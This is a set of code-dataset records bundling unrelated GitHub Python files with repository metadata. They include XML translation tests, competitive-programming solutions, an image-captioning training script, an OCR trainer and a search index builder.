"abd.nh25@gmail.com"
] | abd.nh25@gmail.com |
a24387d89088254301d368ebf2e5e55d143a8c4c | 0f0f8b3b027f412930ca1890b0666538358a2807 | /dotop/addons/base/tests/test_translate.py | c61011c1179ece9a596ac5d562a30db71e6c1d7e | [] | no_license | konsoar/dotop_pos_v11 | 741bd5ca944dfd52eb886cab6f4b17b6d646e131 | 576c860917edd25661a72726d0729c769977f39a | refs/heads/master | 2021-09-06T13:25:34.783729 | 2018-02-07T02:11:12 | 2018-02-07T02:11:12 | 111,168,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,651 | py | # -*- coding: utf-8 -*-
# Part of dotop. See LICENSE file for full copyright and licensing details.
import unittest
from dotop.tools.translate import quote, unquote, xml_translate, html_translate
from dotop.tests.common import TransactionCase
class TranslationToolsTestCase(unittest.TestCase):
def test_quote_unquote(self):
def test_string(str):
quoted = quote(str)
#print "\n1:", repr(str)
#print "2:", repr(quoted)
unquoted = unquote("".join(quoted.split('"\n"')))
#print "3:", repr(unquoted)
self.assertEquals(str, unquoted)
test_string("""test \nall kinds\n \n o\r
\\\\ nope\n\n"
""")
# The ones with 1+ backslashes directly followed by
# a newline or literal N can fail... we would need a
# state-machine parser to handle these, but this would
# be much slower so it's better to avoid them at the moment
self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
\\\\nope\n\n"
""")
def test_translate_xml_base(self):
""" Test xml_translate() without formatting elements. """
terms = []
source = """<form string="Form stuff">
<h1>Blah blah blah</h1>
Put some more text here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah blah blah', 'Put some more text here'])
def test_translate_xml_text(self):
""" Test xml_translate() on plain text. """
terms = []
source = "Blah blah blah"
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms, [source])
def test_translate_xml_text_entity(self):
""" Test xml_translate() on plain text with HTML escaped entities. """
terms = []
source = "Blah&nbsp;blah&nbsp;blah"
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms, [source])
def test_translate_xml_inline1(self):
""" Test xml_translate() with formatting elements. """
terms = []
source = """<form string="Form stuff">
<h1>Blah <i>blah</i> blah</h1>
Put some <b>more text</b> here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah <i>blah</i> blah', 'Put some <b>more text</b> here'])
def test_translate_xml_inline2(self):
""" Test xml_translate() with formatting elements embedding other elements. """
terms = []
source = """<form string="Form stuff">
<b><h1>Blah <i>blah</i> blah</h1></b>
Put <em>some <b>more text</b></em> here
<field name="foo"/>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah <i>blah</i> blah', 'Put <em>some <b>more text</b></em> here'])
def test_translate_xml_inline3(self):
""" Test xml_translate() with formatting elements without actual text. """
terms = []
source = """<form string="Form stuff">
<div>
<span class="before"/>
<h1>Blah blah blah</h1>
<span class="after">
<i class="hack"/>
</span>
</div>
</form>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Form stuff', 'Blah blah blah'])
def test_translate_xml_t(self):
""" Test xml_translate() with t-* attributes. """
terms = []
source = """<t t-name="stuff">
stuff before
<span t-field="o.name"/>
stuff after
</t>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['stuff before', 'stuff after'])
def test_translate_xml_off(self):
""" Test xml_translate() with attribute translate="off". """
terms = []
source = """<div>
stuff before
<div t-translation="off">Do not translate this</div>
stuff after
</div>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['stuff before', 'stuff after'])
def test_translate_xml_attribute(self):
""" Test xml_translate() with <attribute> elements. """
terms = []
source = """<field name="foo" position="attributes">
<attribute name="string">Translate this</attribute>
<attribute name="option">Do not translate this</attribute>
</field>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['Translate this'])
def test_translate_xml_a(self):
""" Test xml_translate() with <a> elements. """
terms = []
source = """<t t-name="stuff">
<ul class="nav navbar-nav">
<li>
<a class="oe_menu_leaf" href="/web#menu_id=42&action=54">
<span class="oe_menu_text">Blah</span>
</a>
</li>
<li class="dropdown" id="menu_more_container" style="display: none;">
<a class="dropdown-toggle" data-toggle="dropdown" href="#">More <b class="caret"/></a>
<ul class="dropdown-menu" id="menu_more"/>
</li>
</ul>
</t>"""
result = xml_translate(terms.append, source)
self.assertEquals(result, source)
self.assertItemsEqual(terms,
['<span class="oe_menu_text">Blah</span>', 'More <b class="caret"/>'])
def test_translate_html(self):
""" Test xml_translate() and html_translate() with <i> elements. """
source = """<i class="fa-check"></i>"""
result = xml_translate(lambda term: term, source)
self.assertEquals(result, """<i class="fa-check"/>""")
result = html_translate(lambda term: term, source)
self.assertEquals(result, source)
class TestTranslation(TransactionCase):
    """ Model-field translation behaviour on res.partner.category (fr_FR). """

    def setUp(self):
        super(TestTranslation, self).setUp()
        # load the French terms of module 'base', then give the fixture
        # category a manual French translation of its name
        self.env['ir.translation'].load_module_terms(['base'], ['fr_FR'])
        self.customers = self.env['res.partner.category'].create({'name': 'Customers'})
        self.env['ir.translation'].create({
            'type': 'model',
            'name': 'res.partner.category,name',
            'module': 'base',
            'lang': 'fr_FR',
            'res_id': self.customers.id,
            'value': 'Clients',
            'state': 'translated',
        })

    def test_101_create_translated_record(self):
        """ Reading the name with and without a lang in the context. """
        category = self.customers.with_context({})
        self.assertEqual(category.name, 'Customers', "Error in basic name_get")
        category_fr = category.with_context({'lang': 'fr_FR'})
        self.assertEqual(category_fr.name, 'Clients', "Translation not found")

    def test_102_duplicate_record(self):
        """ copy() under fr_FR keeps both source value and translation. """
        category = self.customers.with_context({'lang': 'fr_FR'}).copy()
        category_no = category.with_context({})
        self.assertEqual(category_no.name, 'Customers', "Duplication did not set untranslated value")
        category_fr = category.with_context({'lang': 'fr_FR'})
        self.assertEqual(category_fr.name, 'Clients', "Did not found translation for initial value")

    def test_103_duplicate_record_fr(self):
        """ copy() with an explicit French default only overrides the translated value. """
        category = self.customers.with_context({'lang': 'fr_FR'}).copy({'name': 'Clients (copie)'})
        category_no = category.with_context({})
        self.assertEqual(category_no.name, 'Customers', "Duplication erased original untranslated value")
        category_fr = category.with_context({'lang': 'fr_FR'})
        self.assertEqual(category_fr.name, 'Clients (copie)', "Did not used default value for translated value")

    def test_104_orderby_translated_field(self):
        """ Test search ordered by a translated field. """
        # create a category with a French translation
        padawans = self.env['res.partner.category'].create({'name': 'Padawans'})
        padawans_fr = padawans.with_context(lang='fr_FR')
        padawans_fr.write({'name': 'Apprentis'})
        # search for categories, and sort them by (translated) name
        categories = padawans_fr.search([('id', 'in', [self.customers.id, padawans.id])], order='name')
        self.assertEqual(categories.ids, [padawans.id, self.customers.id],
            "Search ordered by translated name should return Padawans (Apprentis) before Customers (Clients)")
| [
"Administrator@20nuo003-PC"
] | Administrator@20nuo003-PC |
b0e17c91d87c7d7e5fcc3f873986d920f6918c16 | 21a561ec0d40554a43dc5a6dfab0f4f62ddb615d | /canteen/base/__init__.py | aaae304df48bbcbcb386327709ca4b1e4a9c8d98 | [
"MIT"
] | permissive | mindis/canteen | 2745a0ebec696d1fbfcc6c4c69582711a4a7e8e6 | a0cf38333417e879712394800a49eb9d0450f96f | refs/heads/master | 2020-12-25T19:15:21.612088 | 2014-02-24T11:29:59 | 2014-02-24T11:29:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | # -*- coding: utf-8 -*-
'''
canteen base
~~~~~~~~~~~~
:author: Sam Gammon <sam@keen.io>
:copyright: (c) Keen IO, 2013
:license: This software makes use of the MIT Open Source License.
A copy of this license is included as ``LICENSE.md`` in
the root of the project.
'''
# import all the things
from .page import *
from .logic import *
from .handler import *
__all__ = (
'page',
'logic',
'handler',
'Page',
'Logic',
'Handler'
)
| [
"sam@keen.io"
] | sam@keen.io |
bc92b0315786a4c62e3b89b66150a21319aea14e | 3ee6c7a9e3191b414dd2e2b48dd0c02b073e6509 | /Codeforces solutions/Jigsaw puzzles.py | e36a897506b67a8b3265bc2bd9f7ab79a1dba594 | [] | no_license | officialstephero/codeforces | 70d334c5ac503a967f1bd7f9a60bc02776d42a96 | db09da45dec49846507eb4f872865ff927b03c81 | refs/heads/main | 2023-09-03T10:40:58.338180 | 2021-11-21T11:51:55 | 2021-11-21T11:51:55 | 430,342,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | n = list(map(int, input().split(' ')))
f = list(map(int, input().split(' ')))
f = sorted(f)
dif = []
for i in range(n[1] - n[0] + 1):
p = f[i:n[0] + i]
dif.append(p[-1] - p[0])
print(min(dif))
| [
"93861108+officialstephero@users.noreply.github.com"
] | 93861108+officialstephero@users.noreply.github.com |
c79dcbd3e94c42a92504220ffb36ebae2587156d | 6d5414a710f09c8a1613e1cb60dfff2d8b37e8ad | /Biweekly Contest 40/Maximum Repeating Substring.py | 62ae08890abed3b5a9fbacc68b6a88d4b8a0ed12 | [] | no_license | prashanthr11/Leetcode | 59985b5037f70933965d509083545e58716b9ec3 | c9a034073062ea01f76448b962152ec8f9b82228 | refs/heads/master | 2023-04-15T09:19:36.526698 | 2021-04-17T16:09:55 | 2021-04-17T16:09:55 | 273,557,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | class Solution:
def maxRepeating(self, a: str, b: str) -> int:
cnt = 0
tmp = b
while b in a:
cnt += 1
b += tmp
return cnt if cnt else 0
| [
"prashanthr6789@gmail.com"
] | prashanthr6789@gmail.com |
0324f681a4d12c47fa524aa35bd3858f1955c899 | 98f730ec6a43d8be4a34b0f2a44a9d35989d2287 | /tests/unit/entity/test_user_groups_entity.py | d83bcc41f01048931032fe2204cd5fa53a0413ae | [] | no_license | scottwr98/pynifi-client | 9337a4f322536ee466d419a788b8b5948cdc62d7 | 013ac2ffa591284a0d6cbb9ed552681cc6f91165 | refs/heads/master | 2020-04-18T08:47:03.680749 | 2017-11-04T23:59:58 | 2017-11-04T23:59:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,351 | py | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import pynifi_client
from pynifi_client.models.user_groups_entity import UserGroupsEntity # noqa: E501
from pynifi_client.rest import ApiException
class TestUserGroupsEntity(unittest.TestCase):
    """UserGroupsEntity unit test stubs (swagger-codegen generated)."""

    def setUp(self):
        # no fixtures needed yet for these generated stubs
        pass

    def tearDown(self):
        # nothing to clean up
        pass

    def testUserGroupsEntity(self):
        """Test UserGroupsEntity"""
        # FIXME: construct object with mandatory attributes with example values
        # model = pynifi_client.models.user_groups_entity.UserGroupsEntity()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"ajish@rootedinsights.com"
] | ajish@rootedinsights.com |
4d6818fd181734e7ac03a56f5310f9b12201c7cb | 5f819267052b7fb0908d32a9f9d335a5f0bb5294 | /trainer.py | 31f5a45cf33f64efe8b3cfdb134f63066ae8f022 | [] | no_license | Quillbolt/stn-crnn | fe5c4a5178a56071d23d7764ae390cd3641ed80c | c2a72fe856590397a137a6885b2d81c833cf730a | refs/heads/main | 2023-02-20T10:36:24.728234 | 2021-01-20T04:21:46 | 2021-01-20T04:21:46 | 331,189,386 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,964 | py | import torch
from tqdm import *
from utils import *
import torchvision.transforms as transforms
from torch.optim.lr_scheduler import CosineAnnealingLR, StepLR
from torch.nn.utils.clip_grad import clip_grad_norm_
from collections import OrderedDict
from itertools import chain
class OCRTrainer(object):
    """Training/validation driver for a CTC-based OCR model.

    ``opt`` is a dict supplying the datasets, model, criterion, optimizer
    and run options; see ``__init__`` for the exact keys that are read.
    """

    def __init__(self, opt):
        super(OCRTrainer, self).__init__()
        self.data_train = opt['data_train']
        self.data_val = opt['data_val']
        self.model = opt['model']
        self.criterion = opt['criterion']  # used through loss_fn (CTC-style signature)
        self.optimizer = opt['optimizer']
        self.schedule = opt['schedule']    # bool: enable the LR scheduler
        self.converter = OCRLabelConverter(opt['alphabet'])  # text <-> label-id codec
        self.evaluator = Eval()
        print('Scheduling is {}'.format(self.schedule))
        self.scheduler = CosineAnnealingLR(self.optimizer, T_max=opt['epochs'])
        self.batch_size = opt['batch_size']
        self.count = opt['epoch']          # current epoch index, shown in the progress bar
        self.epochs = opt['epochs']
        self.cuda = opt['cuda']
        self.collate_fn = opt['collate_fn']
        # self.noise = opt.noise
        self.init_meters()

    def init_meters(self):
        """Create running-average meters for train/val loss and accuracies."""
        self.avgTrainLoss = AverageMeter("Train loss")
        self.avgTrainCharAccuracy = AverageMeter("Train Character Accuracy")
        self.avgTrainWordAccuracy = AverageMeter("Train Word Accuracy")
        self.avgValLoss = AverageMeter("Validation loss")
        self.avgValCharAccuracy = AverageMeter("Validation Character Accuracy")
        self.avgValWordAccuracy = AverageMeter("Validation Word Accuracy")

    def forward(self, x):
        """Run the model and swap the first two axes (CTC expects time-major)."""
        logits = self.model(x)
        return logits.transpose(1, 0)

    def loss_fn(self, logits, targets, pred_sizes, target_sizes):
        """Apply the configured criterion to one batch."""
        loss = self.criterion(logits, targets, pred_sizes, target_sizes)
        return loss

    def step(self):
        """Clip gradients and take one optimizer step."""
        self.max_grad_norm = 0.05
        clip_grad_norm_(self.model.parameters(), self.max_grad_norm)
        self.optimizer.step()

    def schedule_lr(self):
        """Advance the LR scheduler; no-op when scheduling is disabled."""
        if self.schedule:
            self.scheduler.step()

    def mixup_data(self, x, y, lengths, alpha):
        """Mixup augmentation over images and (flattened) label sequences.

        NOTE(review): not called anywhere in this class — presumably kept
        for experimentation; confirm before removing.
        """
        y = self.evaluator.format_target(y, lengths)
        if alpha > 0:
            lam = np.random.beta(alpha, alpha)
        else:
            lam = 1
        batch_size = x.size()[0]
        index = torch.randperm(batch_size)
        mixed_x = lam * x + (1 - lam) * x[index, :]
        y_a, y_b = y, [y[i] for i in index]
        lengths_b = torch.LongTensor([lengths[i] for i in index])
        y_a, y_b = torch.LongTensor(torch.LongTensor(list(chain((*y_a))))), \
            torch.LongTensor(torch.LongTensor(list(chain((*y_b)))))
        return mixed_x, y_a, y_b, lengths, lengths_b, lam

    def _run_batch(self, batch, report_accuracy=False, validation=False):
        """Forward one batch, compute the loss and (optionally) accuracies.

        NOTE(review): tensors are moved with ``.cuda()`` unconditionally,
        ignoring the ``self.cuda`` flag — confirm a GPU is always assumed.
        NOTE(review): when ``report_accuracy`` is False, ``ca``/``wa`` are
        unbound and the return raises — all current callers pass True.
        """
        input_, targets = batch['img'].cuda(), batch['label']
        targets, lengths = self.converter.encode(targets)
        logits = self.forward(input_)
        logits = logits.contiguous().cpu()
        logits = torch.nn.functional.log_softmax(logits, 2)
        T, B, H = logits.size()
        pred_sizes = torch.LongTensor([T for i in range(B)])
        targets = targets.view(-1).contiguous()
        loss = self.loss_fn(logits, targets, pred_sizes, lengths)
        if report_accuracy:
            probs, preds = logits.max(2)
            preds = preds.transpose(1, 0).contiguous().view(-1)
            sim_preds = self.converter.decode(preds.data, pred_sizes.data, raw=False)
            ca = np.mean((list(map(self.evaluator.char_accuracy, list(zip(sim_preds, batch['label']))))))
            wa = np.mean((list(map(self.evaluator.word_accuracy, list(zip(sim_preds, batch['label']))))))
        return loss, ca, wa

    def run_epoch(self, validation=False):
        """Iterate one full epoch over the train or validation loader."""
        if not validation:
            loader = self.train_dataloader()
            pbar = tqdm(loader, desc='Epoch: [%d]/[%d] Training'%(self.count,
                self.epochs), leave=True)
            self.model.train()
        else:
            loader = self.val_dataloader()
            pbar = tqdm(loader, desc='Validating', leave=True)
            self.model.eval()
        outputs = []
        for batch_nb, batch in enumerate(pbar):
            if not validation:
                output = self.training_step(batch)
            else:
                output = self.validation_step(batch)
            pbar.set_postfix(output)
            outputs.append(output)
        self.schedule_lr()
        if not validation:
            result = self.train_end(outputs)
        else:
            result = self.validation_end(outputs)
        return result

    def training_step(self, batch):
        """One optimization step; returns scalar metrics for logging."""
        loss, ca, wa = self._run_batch(batch, report_accuracy=True)
        self.optimizer.zero_grad()
        loss.backward()
        self.step()
        output = OrderedDict({
            'loss': abs(loss.item()),
            'train_ca': ca.item(),
            'train_wa': wa.item()
        })
        return output

    def validation_step(self, batch):
        """Metrics for one validation batch (no parameter update)."""
        loss, ca, wa = self._run_batch(batch, report_accuracy=True, validation=True)
        output = OrderedDict({
            'val_loss': abs(loss.item()),
            'val_ca': ca.item(),
            'val_wa': wa.item()
        })
        return output

    def train_dataloader(self):
        """Shuffled loader over the training set."""
        # logging.info('training data loader called')
        loader = torch.utils.data.DataLoader(self.data_train,
                batch_size=self.batch_size,
                collate_fn=self.collate_fn,
                shuffle=True)
        return loader

    def val_dataloader(self):
        """Sequential loader over the validation set."""
        # logging.info('val data loader called')
        loader = torch.utils.data.DataLoader(self.data_val,
                batch_size=self.batch_size,
                collate_fn=self.collate_fn)
        return loader

    def train_end(self, outputs):
        """Fold per-batch training metrics into epoch averages."""
        for output in outputs:
            self.avgTrainLoss.add(output['loss'])
            self.avgTrainCharAccuracy.add(output['train_ca'])
            self.avgTrainWordAccuracy.add(output['train_wa'])
        train_loss_mean = abs(self.avgTrainLoss.compute())
        train_ca_mean = self.avgTrainCharAccuracy.compute()
        train_wa_mean = self.avgTrainWordAccuracy.compute()
        result = {'train_loss': train_loss_mean, 'train_ca': train_ca_mean,
                'train_wa': train_wa_mean}
        # result = {'progress_bar': tqdm_dict, 'log': tqdm_dict, 'val_loss': train_loss_mean}
        return result

    def validation_end(self, outputs):
        """Fold per-batch validation metrics into epoch averages."""
        for output in outputs:
            self.avgValLoss.add(output['val_loss'])
            self.avgValCharAccuracy.add(output['val_ca'])
            self.avgValWordAccuracy.add(output['val_wa'])
        val_loss_mean = abs(self.avgValLoss.compute())
        val_ca_mean = self.avgValCharAccuracy.compute()
        val_wa_mean = self.avgValWordAccuracy.compute()
        result = {'val_loss': val_loss_mean, 'val_ca': val_ca_mean,
                'val_wa': val_wa_mean}
        return result
"khiembka1992@gmail.com"
] | khiembka1992@gmail.com |
0e1f057eb60d71eb77035c425589ccfcfdccfee4 | 46ed61ef3c08908b0be5a9c38f1f6c017577eced | /attention_src/coco_train.py | d4f676d7eb550185eef36996edbafb2284a8bf41 | [] | no_license | miss993/Attention-Modeling-for-Image-Captioning | 4fa05c9c0da34ec8968fe99bdd111461f9969089 | 7a8c67d410b17edb1465eaec522f7f41fff8ea7d | refs/heads/master | 2020-05-24T20:34:15.998191 | 2018-11-17T18:02:10 | 2018-11-17T18:02:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,372 | py | import argparse
import torch
import torch.nn as nn
import numpy as np
import os
import pickle
from coco_data_loader import get_train_loader
from coco_build_vocab import Vocabulary
from coco_model import EncoderCNN, DecoderRNNWithAttention
from torch.nn.utils.rnn import pack_padded_sequence
from torchvision import transforms
"""
While training next time, change crop image to resize image to be consistent.
"""
# Device configuration
device = torch.device('cuda:3' if torch.cuda.is_available() else 'cpu')
print(device)
def main(args):
    """Train the attention captioner on COCO.

    Loads the vocabulary, builds the data loader and the encoder/decoder,
    then optimizes cross-entropy plus a doubly stochastic attention
    regularizer, checkpointing every ``args.save_step`` iterations.
    """
    # Create model directory
    if not os.path.exists(args.model_path):
        os.makedirs(args.model_path)
    # Image preprocessing, normalization for the pretrained resnet
    transform = transforms.Compose([
        #transforms.RandomCrop(args.crop_size),
        transforms.Resize((args.image_size, args.image_size)),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        transforms.Normalize((0.485, 0.456, 0.406),
                             (0.229, 0.224, 0.225))])
    # Load vocabulary wrapper
    with open(args.vocab_path, 'rb') as f:
        vocab = pickle.load(f)
    # Build data loader
    data_loader = get_train_loader(args.image_dir, args.caption_path, vocab,
                                   transform, args.batch_size,
                                   shuffle=True, num_workers=args.num_workers)
    # Build the models
    encoder = EncoderCNN(args.encoded_image_size).to(device)
    decoder = DecoderRNNWithAttention(args.embed_size, args.attention_size, args.hidden_size, len(vocab)).to(device)
    # Loss and optimizer: only the decoder and the encoder's adaptive pool
    # are optimized; the rest of the CNN backbone is left untouched
    criterion = nn.CrossEntropyLoss().to(device)
    params = list(decoder.parameters()) + list(encoder.adaptive_pool.parameters())
    optimizer = torch.optim.Adam(params, lr=args.learning_rate)
    # Train the models
    total_step = len(data_loader)
    for epoch in range(args.num_epochs):
        for i, (images, captions, lengths) in enumerate(data_loader):
            # Set mini-batch dataset
            images = images.to(device)
            captions = captions.to(device)
            lengths = lengths.to(device)
            # Forward, backward and optimize
            features = encoder(images)
            scores, captions, lengths, alphas = decoder(features, captions, lengths, device)
            # shift by one: the decoder is scored on tokens 1..N
            targets = captions[:, 1:]
            # Remove padded words to calculate score
            targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]
            scores = pack_padded_sequence(scores, lengths, batch_first=True)[0]
            # cross entropy loss and doubly stochastic attention regularization
            loss = criterion(scores, targets)
            loss += 1.0 * ((1 - alphas.sum(dim=1))**2).mean()
            decoder.zero_grad()
            encoder.zero_grad()
            loss.backward()
            optimizer.step()
            # Print log info
            if i % args.log_step == 0:
                print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}, Perplexity: {:5.4f}'
                      .format(epoch, args.num_epochs, i, total_step, loss.item(), np.exp(loss.item())))
            # Save the model checkpoints
            if (i+1 + epoch*total_step) % args.save_step == 0:
                torch.save(decoder.state_dict(), os.path.join(
                    args.model_path, 'decoder-{}-{}.ckpt'.format(epoch+1, i+1)))
                torch.save(encoder.state_dict(), os.path.join(
                    args.model_path, 'encoder-{}-{}.ckpt'.format(epoch+1, i+1)))
if __name__ == '__main__':
    # CLI entry point: data paths, checkpoint cadence and hyperparameters.
    parser = argparse.ArgumentParser()
    parser.add_argument('--model_path', type=str, default='./coco_models_resized/', help='path for saving trained models')
    #parser.add_argument('--crop_size', type=int, default=224, help='size for randomly cropping images')
    parser.add_argument('--image_size', type=int, default=224, help='size input images')
    parser.add_argument('--vocab_path', type=str, default='./data/coco_vocab.pkl', help='path for vocabulary wrapper')
    parser.add_argument('--image_dir', type=str, default='../mscoco/resized_train2014', help='directory for resized images')
    parser.add_argument('--caption_path', type=str, default='../mscoco/annotations/captions_train2014.json', help='path for train annotation json file')
    parser.add_argument('--log_step', type=int, default=100, help='step size for prining log info')
    parser.add_argument('--save_step', type=int, default=6000, help='step size for saving trained models')
    # Model parameters
    parser.add_argument('--embed_size', type=int, default=256, help='dimension of word embedding vectors')
    parser.add_argument('--encoded_image_size', type=int, default=14, help='dimension of encoded image')
    parser.add_argument('--attention_size', type=int, default=384, help='dimension of attention layers')
    parser.add_argument('--hidden_size', type=int, default=384, help='dimension of lstm hidden states')
    parser.add_argument('--num_epochs', type=int, default=10)
    parser.add_argument('--batch_size', type=int, default=64)
    parser.add_argument('--num_workers', type=int, default=4)
    parser.add_argument('--learning_rate', type=float, default=0.0005)
    args = parser.parse_args()
    print(args)
    main(args)
| [
"chaitanya100100@gmail.com"
] | chaitanya100100@gmail.com |
9363a989c86865fd89d14d0fc1c01f2e8361c7b4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p04011/s295435245.py | 4d2ae76e99072dfb9ca262f4ebf7f3e478f48296 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | N = int(input())
K = int(input())
X = int(input())
Y = int(input())
ans = 0
if N>=K:
ans = K*X+(N-K)*Y
if N<K:
ans = N*X
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f72c2d83842366bb3b5275dacda4c858fffcf29b | 4da53524474bbb91202ae1be9ad312c03cff35c7 | /b58.py | 22f992978676ac447d29be6467b0866ee9f1f3f4 | [] | no_license | sedhuraman146/sedhuprg | 642d1b841085b56843b3c5a1b603a2ca97a66465 | 94f5d1311c1c1ba5379c0d4c3d9e3cc5f4bf2baf | refs/heads/master | 2020-05-15T15:23:01.893750 | 2019-05-14T06:20:16 | 2019-05-14T06:20:16 | 182,371,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | n=int(input("enter the number:"))
c=0
while(n>0):
n=n//10
c=c+1
print(c)
| [
"noreply@github.com"
] | sedhuraman146.noreply@github.com |
1da82694458a1675eda0715f585913a2ace1f065 | cd25757a1ce38f99534f8790e9d4359ab609fc17 | /build_index.py | f6d9ab58ca76b8c373d37eab4bd893fd9a161f81 | [] | no_license | daviddwlee84/SearchEngine | 64be99b2114364e8a0913a51d11215bb3c9806fa | 283d1db39900cddf3a2aad6141bd8c9f253a832a | refs/heads/master | 2023-03-16T17:55:22.135027 | 2021-02-24T09:49:54 | 2021-02-24T09:49:54 | 288,898,452 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,231 | py | # Build index for search models
import os
import sys
import pandas as pd
from tqdm import tqdm
import argparse
curr_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(curr_dir)
from search.annoy.build_index import AnnoyIndexBuilder
from search.elastic_search.build_index import ESIndexBuilder
class IndexBuilder(object):
    """Builds search indices in both backends: Annoy (ANN) and Elasticsearch.

    Either backend can be switched off with the ``ignore_*`` flags; every
    method below guards on ``self.do_ann`` / ``self.do_es`` accordingly.
    """

    def __init__(self, annoy_dir: str,
                 es_index: str, es_host: str,
                 ignore_ann: bool = False, ignore_es: bool = False):
        self.do_ann = not ignore_ann
        self.do_es = not ignore_es
        if not ignore_ann:
            # Note, currently ANN can only be build from scratch (can't add index after load)
            # unless we store embedding
            self.ann_builder = AnnoyIndexBuilder()
            self.ann_dir = annoy_dir
        if not ignore_es:
            self.es_builder = ESIndexBuilder(host=es_host, index=es_index)

    def initialize(self):
        """
        Reset both backends before a rebuild.

        Annoy: remove *.ann, mapping.json, *.pkl
        ES   : delete and re-create the index

        https://stackoverflow.com/questions/47087741/use-tqdm-progress-bar-with-pandas
        """
        if self.do_ann:
            self.ann_builder.remove_old_files(self.ann_dir)
        if self.do_es:
            self.es_builder.clear_old_index()
            self.es_builder.create_index()

    def build_indices_for_pandas_object(self, df: pd.DataFrame):
        """
        Index every row of ``df`` in the enabled backends.

        TODO: dealing with NaN problem (especially pd.NaT in date)
        (currently just ignore the date if NaT in elastic search index builder)
        """
        for i, row in tqdm(df.iterrows(), total=len(df)):
            if self.do_ann:
                self.ann_builder.add_index_for_article(index=i, article=row)
            if self.do_es:
                self.es_builder.add_index_for_article(
                    index=i, article=dict(row))

    def build_indices_for_json_file(self, json_file: str):
        """Planned streaming loader for large JSON dumps (not implemented)."""
        # TODO: load stuff and convert the data type, this is important if the memory is limited
        pass

    def finish(self):
        """Flush/persist both indices after all rows have been added."""
        if self.do_ann:
            self.ann_builder.build_index()
            self.ann_builder.save_index(self.ann_dir)
        if self.do_es:
            self.es_builder.finish_indexing()
def parse_args(argv=None):
    """Parse command-line options for the index builder.

    Args:
        argv: Optional list of argument strings.  ``None`` (the default)
            keeps the previous behaviour of reading ``sys.argv[1:]``;
            passing a list makes the function testable without touching
            the real command line.

    Returns:
        argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--annoy-dir', type=str, default=os.path.join(curr_dir, 'index'),
                        help='Directory to place ANN models and related files.')
    parser.add_argument('--es-host', type=str, default='http://stcadmin-dgx-station-002:9200',
                        help='Elastic search host address.')
    parser.add_argument('--es-index', type=str, default='news',
                        help='Elastic search index to store')
    parser.add_argument('--file', type=str, default=os.path.join(curr_dir, 'tools/Crawler/result/news/all_news.tsv'),
                        help='File to be parse and add')
    parser.add_argument('--initialize', action='store_true',
                        help='Initialize elastic search records (be careful!) and remove annoy model (not necessary).')
    parser.add_argument('--ignore-ann', action='store_true',
                        help='Do not built for ANN.')
    parser.add_argument('--ignore-es', action='store_true',
                        help='Do not built for ES.')
    return parser.parse_args(argv)
# python3 SearchEngine/build_index.py --file parsed_tencent.tsv --ignore-ann --initialize
if __name__ == "__main__":
    # Script entry point: load a TSV/JSON crawl result and index every row.
    from utils.data_loader import load_tsv
    args = parse_args()
    builder = IndexBuilder(
        annoy_dir=args.annoy_dir, es_host=args.es_host, es_index=args.es_index,
        ignore_ann=args.ignore_ann, ignore_es=args.ignore_es)
    if args.initialize:
        print('Initializing checkpoints and elastic search data.')
        builder.initialize()
    if args.file.endswith('.tsv'):
        df = load_tsv(args.file)
    elif args.file.endswith('.json'):
        # JSON dumps go through the crawler's combiner first
        from crawler.manager.combine_results import CombineResult
        comb = CombineResult(simplify=True)
        df = comb.load_from_json(args.file)
    else:
        print('Invalid file name', args.file)
        exit()
    builder.build_indices_for_pandas_object(df)
| [
"daviddwlee84@gmail.com"
] | daviddwlee84@gmail.com |
